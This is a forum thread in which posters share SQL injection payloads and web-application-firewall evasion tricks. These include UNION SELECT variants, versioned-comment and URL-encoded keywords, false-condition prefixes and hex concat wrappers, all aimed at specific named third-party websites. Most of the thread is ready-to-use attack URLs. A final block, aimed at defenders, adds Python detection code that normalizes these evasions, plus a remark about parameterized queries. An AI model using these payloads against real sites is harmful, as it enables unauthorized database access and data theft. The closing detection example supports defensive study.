Some problems in injection and how to bypass them

CODE3

New Member
sql Injection Professional & many WAF Bypassing TRK
Some problems in injection and how to bypass them

:: like ::
PHP:
http://fzszy.chinacourt.org/public/detail.php?id=-168' union /*!%53elect*/ version() --+


Open the page source: press Ctrl+F and type 5.0

and to avoid Source Code Injection and make the info appear inside the img in the main page

use
concat(0x223e3c62723e,version(),0x3c696d67207372633d22)
or
concat(0x273e27,version(),0x3c212d2d)


PHP:
http://fzszy.chinacourt.org/public/detail.php?id=-168' union /*!%53elect*/ concat(0x223e3c2f613e3c2f74643e,version(),0x3c6120687265663d22)--+



 

CODE3

New Member
Re: sql Injection Professional & many WAF Bypassing TRK


(2)
PHP:
jumble.dibbaa.com/article.php?id=7' union select 1,2,3,4,5,6,7,8 +--+


No column appears in the page. I will use div+0; I will put it before union select

or use one of these

div+0
Having+1=0
AND+1=0
/*!and*/+1=0
and(1)=(0) x

OR false the url query

id=-1 union all select
id=null union all select
id=1+and+false+union+all+select
id=9999 union all select

PHP:
jumble.dibbaa.com/article.php?id=7' div 0 union select 1,2,3,4,5,6,7,8 +--+




 

CODE3

New Member
Re: sql Injection Professional & many WAF Bypassing TRK

PHP:
http://www.phm.ie/project.php?cat=Conservation

You can use many methods to bypass Forbidden

like

+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/

PHP:
http://www.phm.ie/project.php?cat=Conservation' +and(1)=(0) +union+distinct+select+ 1,version(),3,4,5,6,7,8,9,10-- -

and use and 1=0 to make the column number appear in the page

or

+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)
 

ABO-SAGER

New Member
Re: sql Injection Professional & many WAF Bypassing TRK

Thank you, but I posted an explanation of how to bypass injection in the source.
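For defenders reading this thread, the following is an added example (not code from any poster here) of detection logic that normalizes the evasion forms listed above, namely URL-encoded keyword letters, MySQL `/*!...*/` versioned comments and `/**/` padding, before matching. The function names, rule names and sample query strings are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# MySQL executes the body of /*!50000 ... */ and /*! ... */, so keep the body.
VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)
# Ordinary /* ... */ comments (including /**/) act as whitespace.
PLAIN = re.compile(r"/\*.*?\*/", re.S)

# Hypothetical rule names; each pattern runs on the normalized text only.
RULES = {
    "union_select": re.compile(
        r"\bunion\s+(?:(?:all|distinct|distinctrow)\s+)?select\b"),
    "false_condition": re.compile(
        r"\b(?:and|having)\s*\(?\s*1\s*\)?\s*=\s*\(?\s*0\s*\)?"
        r"|\bdiv\s+0\b|\band\s+false\b"),
    "hex_concat": re.compile(r"\bconcat\s*\(\s*0x[0-9a-f]+"),
}

def normalize(raw: str) -> str:
    """Reduce a raw query string to roughly the SQL text MySQL would parse."""
    text = raw
    for _ in range(3):                      # bounded: handles double encoding
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    text = VERSIONED.sub(r" \1 ", text)     # unwrap executable comments
    text = PLAIN.sub(" ", text)             # drop inert comments
    return re.sub(r"\s+", " ", text).lower().strip()

def classify(raw: str) -> list[str]:
    """Return the sorted names of the rules that match after normalization."""
    norm = normalize(raw)
    return sorted(name for name, rx in RULES.items() if rx.search(norm))

# Constructed query strings (not real traffic) using the forms from the thread.
SAMPLES = [
    "id=-168'+union+/*!%53elect*/+version()+--+",
    "id=7'/**//*!50000UNION SELECT*//**/1,2,3--+",
    "cat=x'+and(1)=(0)+union+distinct+select+1,version(),3--+-",
    "id=7'+div+0+union+select+concat(0x273e27,version(),0x3c212d2d)--+",
    "q=trade+union+history",               # benign control
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(classify(s) or ["clean"], "<-", s)
```

Matching on the normalized text is what makes the rules hold up against these variants; the underlying flaw is still fixed in the application by using parameterized queries.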
 